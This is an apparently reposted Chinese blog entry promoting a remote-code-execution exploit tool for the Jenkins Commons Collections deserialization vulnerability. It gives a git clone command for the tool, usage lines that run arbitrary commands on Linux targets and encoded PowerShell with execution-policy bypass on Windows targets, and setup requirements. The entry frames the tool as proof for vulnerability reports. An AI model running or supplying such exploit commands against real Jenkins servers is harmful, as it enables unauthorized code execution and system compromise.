码迷,mamicode.com
首页 > 其他好文 > 详细

[转]Jenkins CommonCollections 完美利用(演示)工具

时间:2015-12-04 18:25:40      阅读:170      评论:0      收藏:0      [点我收藏+]

标签:

博主URL:http://tools.changesec.com/Jenkins-CommonCollections-Exploit/

提交漏洞总是要证明漏洞危害,老外写的java代码又有bug,所以随手改掉了

点击这里下载代码,或者使用如下命令

git clone https://github.com/CaledoniaProject/jenkins-cli-exploit.git

来张截图吧,

技术分享

工具的具体使用方法,

如果目标是 Linux、Mac 机器,请使用,

./client.pl --url http://127.0.0.1:8080/jenkins/ --os linux --cmd ‘{ whoami; ls -lh; } > /tmp/hacked‘

如果是 Windows 机器,

./client.pl --url http://127.0.0.1:8080/jenkins/ --os win --cmd ‘powershell -ep bypass -enc xxxxx‘

环境要求,

  1. 确保你安装了 java、perl
  2. 确保你安装了 IPC::Run 这个PERL模块,安装方法为 cpan IPC::Run
编写于 November 15, 2015

[转]Jenkins CommonCollections 完美利用(演示)工具

标签:

原文地址:http://www.cnblogs.com/sevck/p/5019988.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!